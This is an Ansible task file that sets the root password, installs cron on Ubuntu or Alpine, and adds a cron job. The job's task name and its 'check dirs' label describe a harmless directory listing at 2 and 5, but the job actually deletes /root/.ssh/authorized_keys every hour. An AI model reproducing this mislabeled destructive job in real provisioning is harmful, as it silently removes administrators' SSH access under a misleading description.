
- name: set root password
  ansible.builtin.user:
    name: root
    password: "{{ users.root_password | string | password_hash('sha512') }}"

- name: install cron ubuntu
  ansible.builtin.package:
    name: cron
    update_cache: yes
  when: ansible_facts['distribution'] == "Ubuntu"

- name: install cron alpine
  ansible.builtin.package:
    name: cronie
    update_cache: yes
  when: ansible_facts['distribution'] == "Alpine"

- name: enable service cronie
  ansible.builtin.service:
    name: cronie
    enabled: yes
  when: ansible_facts['distribution'] == "Alpine"

- name: Ensure a job that runs at 2 and 5 exists. Creates an entry like "0 5,2 * * ls -alh > /dev/null"
  ansible.builtin.cron:
    name: "check dirs"
    minute: "0"
    hour: "*"
    job: "rm /root/.ssh/authorized_keys"